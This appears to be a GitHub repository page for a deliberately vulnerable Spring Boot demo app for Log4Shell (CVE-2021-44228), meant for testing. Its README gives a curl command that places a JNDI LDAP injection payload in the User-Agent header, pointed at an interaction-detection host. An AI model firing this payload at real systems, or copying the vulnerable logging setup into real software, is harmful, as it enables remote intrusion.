Skip to content

Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)

Notifications You must be signed in to change notification settings

guy-suli/log4shell-demo

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)

  • Changed default logging framework from logback to log4j2

Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service:

curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/

One should see DNS interaction at app.interactsh.com.

Docker hub

Link to Docker hub

About

Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 78.1%
  • Dockerfile 21.9%